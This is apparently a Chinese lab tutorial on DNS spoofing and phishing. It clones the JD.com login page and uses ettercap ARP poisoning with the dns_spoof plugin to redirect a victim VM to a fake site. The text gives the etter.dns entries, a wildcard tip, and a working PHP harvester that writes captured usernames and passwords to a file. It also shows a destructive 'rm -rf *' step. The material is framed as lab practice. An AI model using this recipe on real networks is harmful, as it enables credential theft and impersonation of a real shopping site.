DNS欺骗与钓鱼网站
实验背景
钓鱼者运用社会工程学只是诱骗受害者,以未授权情况下获取对方的姓名、年龄、邮箱账号、甚至是银行卡密码等私人信息。
钓鱼往往呵社会工程学结合进行诱导,而社会工程学时黑客的内功,能否灵活运用可以体现一个黑客的个人修为,所以说防人之心不可无。
社会工程学黑客常见伎俩:
- 电话号码欺骗
- 利用坏消息作案
- 滥用网民对社交等网络的信任
- 二维码引诱
实验目标
使用kali系统模拟攻击者,利用中间人攻击手段来对受害者进行DNS欺骗、使受害者通过访问假的京东网站,来获取用户登录的用户名与密码
实验原理
实验流程
打开三台虚拟机
打开win2003的DNS服务器
打开正向区域右键建立解析文件jd.com,无脑下一步直到写区域名称
继续无脑下一步就完成了
在jd.com中右键新建主机
ip地址为win2003服务器的地址
买了一级域名二级域名就可以不花钱
例如:
www.sina.com
mp3.sina.com
sina买了,前边可以随便变动
打开IIS新建一个网站jd
IP为本地IP
先来扒个jd的网页
打开京东官网登录页面
鼠标右键--->网页另存为---->保存到本地
将jd文件拖进win2003,放在D盘
(静态网页)
继续添加网站
静态网页,读取权限即可
添加index.html
将其移动到最上面
在winxp访问jd.com
失败力
打开网络连接属性设置
此时win2003是DNS服务器所以应该将DNS服务器的IP写为win2003的IP
在winxp中再次手工解析,成功了,jd的地址为192.168.71.129
在winxp中用域名访问jd网站(好怪,,,)
打开kali进行配置,输入命令进行ettercap配置
vim /etc/ettercap/etter.dns
i键为写入模式
写入这两条指令
www.jd.com A 192.168.71.130
www.jd.com PTR 192.168.71.130
A 称为正向解析
PTR 是反向解析
解析方向:
为了实验的成功性,因为许多系统会反向验证,所以多写一条
如果再恨亿点,可以用*取代www.jd.com,这样无论你问什么域名攻击者都会告诉你这就是192.168.71.130
退出vim编辑器
先按Esc,再按:最下面出现如下界面,
输入wq回车即可退出
开启apache
输入如下命令
systemctl start apache2
没提示就成功了
接下来进行验证,查看其端口是否开放
netstat -antql
查看到一个80端口,是apache2,处于监听状态
apache默认站点路径
/var目录主要存放可变文件,像日志,缓存等
键入如下命令
cd /var/www/html/
发现有一些网页,把这些删了
输入命令删除,不要输错了!!!!!
rm -rf *
加工一个jd假网站,能够在用户登录时实现一个信息收集
F12查看网页代码,再按ctrl+f搜form找到这一行
将下边代码的account改为loginname,passwd改为nloginpwd
<?php
$nam = stripslashes($_POST['account']);
$pas = stripslashes($_POST['passwd']);
$content = "你已捕获京东账号及密码1个:" . "用户名 " . $nam . "密码" . $pas;
$filed = @fopen("1.txt" , "a+");
@fwrite($filed, "$content\n");?>
<html>
<head><script type = "text/javascript">function goBack(){window.history.back() //后退+刷新)</script>
</head>
<body onload = "goBack()"> <!--加载之后立即执行一段 JavaScript -->
</body>
</html>
先将网站拖进kali(注意一下有没有少文件,多拖几次)
使用命令将jd这个文件夹复制到/var/www/html/下
查看文件权限
ls -l
更改文件权限
chmod 777 1.txt
到此为止网站就做好了
kali开始攻击
打开ettercap,在终端行输入命令
ettercap -G
ettercap扫描到两台主机
设定目标1和目标2
点击ARP Poisoning
点击ok
这只是arp欺骗无法进行投毒
在菜单栏选择plugins----->选择manage plugins
出现如下界面
双击打开,伪装DNS服务器进行欺骗
先在xp中清理缓存
输入命令
ipconfig /flushdns
使用vim编辑index.html文件
将此处改为action=“error.php”
在xp中登录jd账号
查看kali中1.txt捕获的信息
DNS欺骗与钓鱼网站相关推荐
- [网络安全自学篇] 四十二.DNS欺骗和钓鱼网站原理详解及防御机理
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了中间人攻击或ARP欺骗攻击,从ARP原理到局域网配置进行描述.这篇文章 ...
- 投毒、伪装、攻击,DNS 欺骗和钓鱼网站如何一步步诱人掉入陷阱?
[编者按]这篇文章将详细讲解DNS欺骗(DNS投毒)及钓鱼网站原理知识,并通过Ettercap工具复现某购物网站的钓鱼漏洞,本文的重点是让您对ARP欺骗.DNS欺骗和钓鱼攻击有一定认识.真心希望这篇基 ...
- 网络安全-DNS欺骗与钓鱼网站
参考博文: [千锋]网络安全300集全套视频教程(web安全/渗透测试/黑客攻防/信息安全/代码审计),网络安全基础入门到精通_哔哩哔哩_bilibili [千锋]网络安全300集全套视频教程(web ...
- 黑客攻击入门:DNS欺骗、ARP攻击和钓鱼网站制作
数据来源 本文仅用于信息安全的学习,请遵守相关法律法规,严禁用于非法途径.若观众因此作出任何危害网络安全的行为,后果自负,与本人无关. 一.背景 钓鱼者运用社会工程学( socia ...
- ARP和DNS欺骗以及网站钓鱼分析
实验目的 1.掌握ARP中间人攻击原理 2.掌握DNS欺骗原理 3.熟悉网站钓鱼的原理. 实验环境 VMware15.0.windows客户端.windows server2008.kali linu ...
- DNS欺骗攻击——实现受害者访问任何网站都转向到攻击者指定的网站 (仅供学习参考)
DNS欺骗攻击--实现受害者访问任何网站都转向到攻击者指定的网站 (仅供学习参考) 情景要求: 同一局域网内 受害者IP:192.168.26.130 攻击者系统Kali Linux,IP地址:192 ...
- ARP攻击与DNS劫持,使被攻击者进入钓鱼网站
实验环境 (因为实验条件有限,虚拟机都采用的是桥接模式,可以与物理机在同一个网段) 钓鱼网站: 虚拟机Windows 2008搭建的网站:IP地址:192.168.43.21: 攻击者: 物理机win ...
- [网络安全学习篇23]:DNS欺骗与钓Y网站(千峰网络安全视频笔记 p114-p116)
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足:对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以 ...
- Norton ConnectSafe,DNS策略防止误入钓鱼网站(Norton Security)
钓鱼.仿冒网站 现在的网络上,存在很多相似的网站,很容易被仿冒的钓鱼网站窃取资料或上当受骗,最近使用Norton杀毒软件的时候,偶然接触到了Norton ConnectSafe (诺顿旗下免费安全DN ...
最新文章
- 如何访问自定义键值的二维数组
- 那传说中的P、NP以及NPC问题
- xvfb-run: error: xauth command not found 解决方式
- 小汤学编程之JAVA基础day03——运算符
- linux 下vim文件乱码 cat文件正常处理方法
- Google开启全新图像目标检测大赛,场景多样性和复杂度史无前例
- mysql 更新删除数据,MYSQL数据的插入、删除、更新
- 怎样找回W ndows7密钥,怎么找到windows7密钥
- 雷军,打不倒的王者!
- mysql max() grou by 的使用小记
- react 网页截图
- html中图片集合,HTML标签大集合
- qq企业邮箱创建过程
- Win32基础学习笔记
- [喷嚏]区块链已落地30个场景 商用时代正在加速来临
- 新加坡南洋理工大学招募博士生、博士后、研究工程师和研究科学家
- Android camera2 框架学习记录
- #### mysql联合索引 注意事项 ####
- BUG记录: Exception evaluating SpringEL expression
- echart 的各大国家城市坐标